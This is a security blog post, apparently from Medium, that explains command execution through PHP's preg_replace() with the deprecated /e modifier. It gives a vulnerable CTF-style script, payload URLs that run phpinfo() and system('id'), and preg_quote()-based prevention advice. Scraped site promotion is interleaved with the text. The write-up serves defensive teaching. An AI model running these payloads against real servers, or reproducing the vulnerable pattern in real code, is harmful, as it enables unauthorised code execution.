Search Write Sign up Sign in

Photo by KOBU Agency on Unsplash

Command Execution -
preg_replace() PHP Function
Exploit | RCE
Roshan Cheriyan · Follow
3 min read · Oct 10, 2020

--

I recently found some code vulnerable to this attack in the wild, so I thought
I’d put together a quick write up for pentesters and PHP coders who may not
be familiar with the danger.
Membership

preg_replace(); Free
Access the best member-only stories.
The preg_replace() function returns a string or array of strings where all
Distraction-free reading. No ads. Support independent authors.
matches of a pattern or list of patterns found in the input are replaced with
Organize your knowledge with lists and Listen to audio narrations.
substrings. (more) highlights.
Sign up to discover human stories that Read offline.

deepen your understanding

Let’sofanalysis
the world.
with a sample code :
Tell your story. Find your audience.
Join the Partner Program and earn for
your writing.

Sign up for free

<?php Try for $5/month

echo "<br >Welcome My Admin ! <br >";

if (isset($_GET['pat']) && isset($_GET['rep']) &&

isset($_GET['sub'])) {
 $pattern = $_GET['pat'];
$replacement = $_GET['rep'];
$subject = $_GET['sub'];

echo "original : ".$subject ."</br>";

echo "replaced : ".preg_replace($pattern, $replacement,
$subject);
}else{
die();
}
?>

Mostly developers used this function for words filtering techniques. such as
email bad words filters. Above code took from one of the CTF challenges
that i played . This code accepts user inputs and replace the user subject
when delimiter/pattern get match .

index.php?pat=/as/&rep=As&sub=as your wish exploit

After executing this , preg_replace() the search for `as` and replace with
`As` .

Exploiting the code:

To exploit the code, all the attacker has to do is provide some PHP code to
execute, generate a regular expression which replaces some or all of the
string with the code, and set the `e` modifier on the regular
expression/pattern

payload: index.php?pat=/a/e&rep=phpinfo();&sub=abc

Membership

Free
Access the best member-only stories.

Distraction-free reading. No ads. Support independent authors.

Organize your knowledge with lists and Listen to audio narrations.

highlights.
Sign up to discover human stories that Read offline.

deepen your understanding of the world. Tell your story. Find your audience.
Join the Partner Program and earn for
your writing.
 So we can execute whatever we want….

Based on the example above, the attacker can execute the id shell command
using the system() function in PHP.

payload : index.php?pat=/a/e&rep=system(‘id’);&sub=abc

Once an attacker is able to execute OS commands, they could attempt to use

a web shell or install other malware. From there, an attacker may even
attempt to compromise other internal systems.

Prevention
PHP provides a function named as preg_quote() which will quote all nasty Membership
characters in the input string andFree
prevent this code execution vulnerability.
Access the best member-only stories.

Distraction-free reading. No ads. Support independent authors.

<?php Organize your knowledge with lists and Listen to audio narrations.
$in = 'Somewhere, something incredible
highlights. is waiting to be known';
Sign up to discover human stories that
echo preg_replace('#' . preg_quote($_GET['replace'], '#') . '#',
$_GET['with'], $in);
Read offline.

deepen your understanding of the world.

?>
Tell your story. Find your audience.
Join the Partner Program and earn for
your writing.

Using preg_quote() renders all regex characters inert, so if you need to allow
some access to use regular expressions, you’ll need to escape your
delimitation character by hand. Be very careful though, this approach is
 error prone; you’ll need to escape the escape character as well, otherwise the
attacker can just escape your escaping with their own escape character.

The implications of this issue stretch far and wide. Its subtle yet deadly
nature make it an easy vulnerability to miss when developing and reviewing
code. Be careful out there, and always think about how you use your input.

Contact :

Twitter | LinkedIn | Instagram | Github

Read More

Source Code Disclosure via Exposed .git Folder

Server-Side Template Injection (SSTI)

PHP Rce Vulnerability Web App Development Web App Security

--

Written by Roshan Cheriyan Follow

70 Followers

Security Researcher || Web Penetration Tester || Reverse Engineer || Web & Flutter
Developer

Help Status About Careers Blog Privacy Terms Text to speech Teams

Membership

Free
Access the best member-only stories.

Distraction-free reading. No ads. Support independent authors.

Organize your knowledge with lists and Listen to audio narrations.

highlights.
Sign up to discover human stories that Read offline.

deepen your understanding of the world. Tell your story. Find your audience.
Join the Partner Program and earn for
your writing.